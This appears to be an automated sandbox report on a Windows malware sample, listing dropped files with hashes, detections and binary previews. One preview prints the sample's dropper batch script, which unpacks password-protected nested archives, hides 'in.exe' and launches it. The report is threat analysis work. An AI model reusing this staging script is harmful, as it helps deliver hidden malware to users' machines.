                                                                                                                                                                                          MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                          SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                          SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                          SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1799902
                                                                                                                                                                                          Entropy (8bit):7.997726708945573
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                          MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                          SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                          SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                          SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1800056
                                                                                                                                                                                          Entropy (8bit):7.997723543142523
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                          MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                          SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                          SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                          SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1800210
                                                                                                                                                                                          Entropy (8bit):7.997720745184939
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                          MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                          SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                          SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                          SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1800364
                                                                                                                                                                                          Entropy (8bit):7.997716835838842
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                          MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                          SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                          SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                          SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3473559
                                                                                                                                                                                          Entropy (8bit):7.9992359395959935
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                          MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                          SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                          SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                          SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1827328
                                                                                                                                                                                          Entropy (8bit):7.963282633529333
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                          MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                          SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                          SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                          SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3473725
                                                                                                                                                                                          Entropy (8bit):7.999948676888215
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                          MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                          SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                          SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                          SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3473725
                                                                                                                                                                                          Entropy (8bit):7.999948676888215
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                          MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                          SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                          SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                          SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):440
                                                                                                                                                                                          Entropy (8bit):5.0791308599041844
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                          MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                          SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                          SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                          SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1827328
                                                                                                                                                                                          Entropy (8bit):7.963282633529333
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                          MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                          SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                          SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                          SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                          Entropy (8bit):3.42653423739623
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:1EvXlLVX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lNEt0:1Ev37BQ1CGAFBZgtVNEt0
                                                                                                                                                                                          MD5:92A49B8903125FCBDC912F02C473C759
                                                                                                                                                                                          SHA1:B3D06E3E2488613F6A0739CEA785357CD7979A12
                                                                                                                                                                                          SHA-256:D95ABFFF93E1BC457FF42C1135F29F6B3F09EEA035D32256113B5DDC03A399B7
                                                                                                                                                                                          SHA-512:9705CAFFE256F1443A0873C374508BDF445BBCCC9E3F56D45A5BE2CF367D8AD4056D01D594BDABD9C59EC51CB69C925494CDDFC02542623F11403212BFCB218E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.....!jT.#.O......v.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):350
                                                                                                                                                                                          Entropy (8bit):5.0682682106683945
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                          MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                          SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                          SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                          SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.5534829387394264
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                          File size:3'003'904 bytes
                                                                                                                                                                                          MD5:4072633a022e6587009b5ca189ff4613
                                                                                                                                                                                          SHA1:d54d3cf0878186b3b8230f1f0b8188bf1bcd738e
                                                                                                                                                                                          SHA256:003b43813ec5522429efc587a873871a2d6fc14c4c9c6008a7d27bce0920db19
                                                                                                                                                                                          SHA512:136ebcb816217cecb81f5b521b7102d54eb17f4f0685ab003e7013cbff75e7074ee93a086f847c5a0f9f0c3f2eb8c5c5706b07fe119182c86d2007699a98f700
                                                                                                                                                                                          SSDEEP:49152:1gK4zTjzmIGvbESuW1QoEi9YJlYAWA9XMv3MaDUyHAHE:p4zTGBvoSuW1Qof9lAWA9Xw3Ma4E
                                                                                                                                                                                          TLSH:59D528D2B60561CFD0CE27B45427CD8A995D03FA872119C7EC1874BBEDA7CC229BAD24
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                          Entrypoint:0x718000
                                                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          jmp 00007F6B30875D9Ah
                                                                                                                                                                                          lfs ebp, dword ptr [00000000h]
                                                                                                                                                                                          add cl, ch
                                                                                                                                                                                          add byte ptr [eax], ah
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax+00h], ah
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          aam 8Fh
                                                                                                                                                                                          in al, 0Fh
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
